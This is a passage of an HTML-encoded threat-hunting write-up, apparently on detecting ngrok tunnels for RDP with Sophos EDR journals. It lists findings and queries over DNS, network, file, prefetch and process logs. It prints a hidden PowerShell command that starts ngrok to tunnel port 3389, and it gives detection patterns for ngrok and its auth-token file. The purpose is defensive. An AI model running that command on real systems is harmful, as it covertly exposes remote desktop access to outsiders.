data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\"><b><span data-contrast=\"none\">Query <\/span><\/b><span data-contrast=\"none\">&gt; sophos_powershell_events<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span>\n<ul>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\">script_text\n<ul>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\">%ngrok%<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\"><b><span data-contrast=\"none\">File.01.0 &#8211; Files on disk (path)<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span>\n<ul>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\"><strong>Finding\u00a0<\/strong> <span data-contrast=\"none\">&gt; ngrok YML file which contains auth token (default location when parsed to ngrok.exe)<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/li>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\"><b><span data-contrast=\"none\">Static variable <\/span><\/b><span data-contrast=\"none\">&gt; <\/span><span style=\"color: #99cc00\"><b>ngrok.yml<\/b><\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/li>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"3\" data-aria-level=\"3\"><b><span data-contrast=\"none\">Query <\/span><\/b><span data-contrast=\"none\">&gt; $$path$$ &gt; C:users%.ngrok2ngrok.yml<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><span class=\"NormalTextRun SCXW87639450 BCX0\">Moving on<\/span><span class=\"NormalTextRun SCXW87639450 BCX0\">,<\/span><span class=\"NormalTextRun SCXW87639450 BCX0\"> we start to dig deeper<\/span> <span class=\"NormalTextRun SCXW87639450 BCX0\">in<\/span> <span class=\"NormalTextRun SCXW87639450 BCX0\">DNS, <\/span><span class=\"NormalTextRun SCXW87639450 BCX0\">Journals,<\/span><span class=\"NormalTextRun SCXW87639450 BCX0\"> and <\/span><span class=\"NormalTextRun SCXW87639450 BCX0\">other logged data<\/span><span class=\"NormalTextRun SCXW87639450 BCX0\">. These options are <\/span><span class=\"NormalTextRun SCXW87639450 BCX0\">presented here <\/span><span class=\"NormalTextRun SCXW87639450 BCX0\">along with the findings.<\/span><\/p>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"1\"><b><span data-contrast=\"auto\"><u>Journal testing: Creating port binding 3389 for RDP via ngrok<\/u><\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"1\"><span data-contrast=\"auto\">Command invoked on the target computer<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"1\"><span data-contrast=\"auto\">powershell.exe \/c Start-Process -WindowStyle Hidden -FilePath ngrok.exe -ArgumentList &#8216;tcp 3389&#8217;<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"1\"><span data-contrast=\"auto\">PowerShell executes the ngrok application and binds the TCP port 3389 (file path assumes ngrok binary is within %system32%), hiding windows, and closing the terminal once the command has completed<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><b><span data-contrast=\"auto\">DNS Journal<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Finding<\/strong> &gt; tunnel.us.ngrok.com\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Static variable<\/strong> &gt; <strong><span style=\"color: #99cc00\">ngrok<\/span><\/strong><\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Query<\/strong> &gt; Sophos_dns_journal\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">Name\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">%grok%<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Network Journal<\/strong>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Finding<\/strong> &gt; Source ::1 | Destination ::1 | DestinationPort 3389\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Static variable<\/strong>\u00a0&gt;<strong><span style=\"color: #99cc00\"> ::1 | 3389<\/span><\/strong><\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Query<\/strong> &gt; Sophos_network_journal\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">Source\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">::1<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">Destination\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">::1<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">Destination port\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">3389<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>File journal<\/strong>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Finding<\/strong> &gt; C:Usersunknown.ngrok2ngrok.yml\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Static variable<\/strong> &gt; <span style=\"color: #99cc00\"><strong>ngrok.yml<\/strong><\/span><\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Query<\/strong> &gt; Sophos_file_journal\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">subject\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">FileOtherReads<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">path\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">%ngrok.yml<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>File.01.0 &#8211; Files on disk (path)<\/strong>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Finding<\/strong> &gt; <span class=\"NormalTextRun SCXW149924267 BCX0\">Prefetch execution entry for <\/span><span class=\"NormalTextRun SCXW149924267 BCX0\">ngrok<\/span><span class=\"NormalTextRun SCXW149924267 BCX0\"> created via <\/span><span class=\"NormalTextRun SpellingErrorV2Themed SCXW149924267 BCX0\">svchost<\/span><span class=\"NormalTextRun SCXW149924267 BCX0\"> process<\/span><\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Static variable<\/strong> &gt; <strong><span style=\"color: #99cc00\">NGROK.EXE%.pf<\/span><\/strong><\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Query<\/strong> &gt; $$path$$ &gt; <strong><span style=\"color: #99cc00\">C:WindowsPrefetchNGROK.EXE%.pf<\/span><\/strong><\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Process Journal<\/strong>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Finding<\/strong> &gt; PowerShell.exe&#8221; \/c Start-Process -WindowStyle Hidden -FilePath ngrok.exe -ArgumentList &#8216;tcp 3389&#8217;\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Static variables<\/strong>\u00a0&gt; <span style=\"color: #99cc00\"><strong>ngrok | tcp 3389<\/strong><\/span><\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Query<\/strong> &gt; Sophos_process_journal\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">CMDLine\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">ngrok<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">tcp 3389<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" 